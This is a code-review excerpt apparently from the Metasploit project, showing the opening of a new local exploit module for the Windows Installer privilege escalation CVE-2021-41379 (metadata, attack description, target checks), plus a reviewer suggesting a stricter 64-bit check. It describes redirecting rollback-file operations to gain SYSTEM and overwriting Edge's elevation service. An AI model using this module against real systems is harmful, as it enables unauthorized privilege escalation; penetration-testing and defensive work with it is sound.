modules/exploits/windows/local/installerfiletakeover.rb

```diff
@@ -0,0 +1,106 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft Windows Installer Service Privilege Escalation',
+        'Description' => %q{
+          On vulnerable versions of Windows the Installer Service executes privileged file operations on
+          the rollback file that is created in a standard user controlled directory. This behaviour can be
+          triggered by failing installation the installation with a specific .msi file. The bug is abused
+          to redirect file creation into an arbitrary location in order to gain SYSTEM level privileges.
+
+          WARNING:
+          The elevation_service.exe (C:\Program Files (x86)\Microsoft\Edge\Application\*) on the target host
+          will be overwritten when the exploit runs.
+
+          This module has been tested against Windows 10 Pro x64 Build 19044.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Abdelhamid Naceri (klinix5)', # Original discovery and PoC
+          'millers-crossing' # msf module
+        ],
+        'Platform' => 'win',
+        'SessionTypes' => ['meterpreter'],
+        'Targets' => [
+          ['Windows 10 x64', { 'Arch' => ARCH_X64 }]
+        ],
+        'References' => [
+          %w[CVE 2021-41379],
+          ['URL', 'https://github.com/klinix5/InstallerFileTakeOver']
+        ],
+        'Notes' => {
+          # Exploit overwrites Microsoft Edge elevation_service.exe.
+          'Stability' => [OS_RESOURCE_LOSS],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        },
+        'DisclosureDate' => '2021-11-22',
+        'DefaultTarget' => 0
+      )
+    )
+  end
+
+  def validate_active_host
+    sysinfo['Computer']
+    true
+  rescue Rex::Post::Meterpreter::RequestError, Rex::TimeoutError => e
+    elog(e)
+    false
+  end
+
+  def validate_target
+    fail_with(Failure::None, 'Session is already elevated') if is_system?
+
+    fail_with(Failure::None, 'The exploit does not support high integrity process') if is_high_integrity?
+
+    fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') if sysinfo['Architecture'] == ARCH_X86
```

Comment:
Checking specifically for the one you want would prevent this from breaking in the future if we added support for another Windows architecture like maybe ARM.

```suggestion
    fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') unless sysinfo['Architecture'] == ARCH_X64
```